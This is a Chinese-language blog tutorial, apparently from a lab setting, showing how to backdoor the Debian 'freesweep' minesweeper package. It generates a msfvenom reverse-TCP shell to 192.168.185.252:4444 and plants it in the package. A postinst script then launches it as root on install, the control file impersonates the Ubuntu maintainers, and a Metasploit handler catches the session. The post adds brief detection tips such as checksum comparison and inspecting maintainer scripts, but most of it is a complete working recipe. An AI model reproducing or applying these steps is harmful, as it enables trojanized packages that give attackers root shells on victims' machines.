制作恶意 deb 软件包来触发后门
使用 --download-only 方式只下载软件包,不进行安装
root@ kali:~# apt --download-only install freesweep

将软件包移动到 root 目录
root@ kali:~# mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ~/

解压软件包到 free 目录
root@ kali:~# dpkg -x freesweep_1.0.2-1_amd64.deb free

生成恶意代码(ELF 可执行文件),写入解压后的软件包目录 usr/games/ 下。该文件由 msfvenom 新生成,重新打包后软件包的内容和校验和都会与官方仓库中的原包不同,对比校验和或文件列表即可发现
root@ kali:~ # msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp
LHOST=192.168.185.252 LPORT=4444 -b "\x00" -i 10 -f elf -o
/root/free/usr/games/freesweep_sources

创建软件包信息目录
root@ kali:~# mkdir free/DEBIAN && cd free/DEBIAN
创建软件包的信息文件
root@ kali:~# tee /root/free/DEBIAN/control << 'EOF'
Package: freesweep
Version: 1.0.2-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
EOF

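创建 deb 软件包的安装后脚本文件(postinst),用来加载后门。dpkg 在安装软件包时会以 root 权限执行 postinst,因此安装来源不明的 deb 包等同于以 root 身份运行其中的脚本;安装前可用 dpkg-deb -I 查看控制信息,或用 dpkg-deb -e 解出 DEBIAN 目录检查维护者脚本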
root@ kali:~# tee /root/free/DEBIAN/postinst << 'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF

给脚本文件添加执行权限
root@ kali:~/free/DEBIAN# chmod 755 /root/free/DEBIAN/postinst
构建新的 deb 安装包
root@ kali:~/free/DEBIAN# dpkg-deb --build /root/free/
dpkg-deb: 正在 '/root/free.deb' 中构建软件包 'freesweep'。
root@ kali:~/free/DEBIAN# ls /root/free.deb

root@ kali:~# msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.185.252
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run

meterpreter > getuid

卸载软件包(dpkg -r 只删除软件包安装的文件,不会结束 postinst 已在后台启动的进程;排查时还需检查正在运行的进程和对外的网络连接)
root@ kali:~# dpkg -r freesweep

本文来自博客园,作者:长温不喜风云,转载请注明原文链接:https://www.cnblogs.com/changwen12138/p/18987612
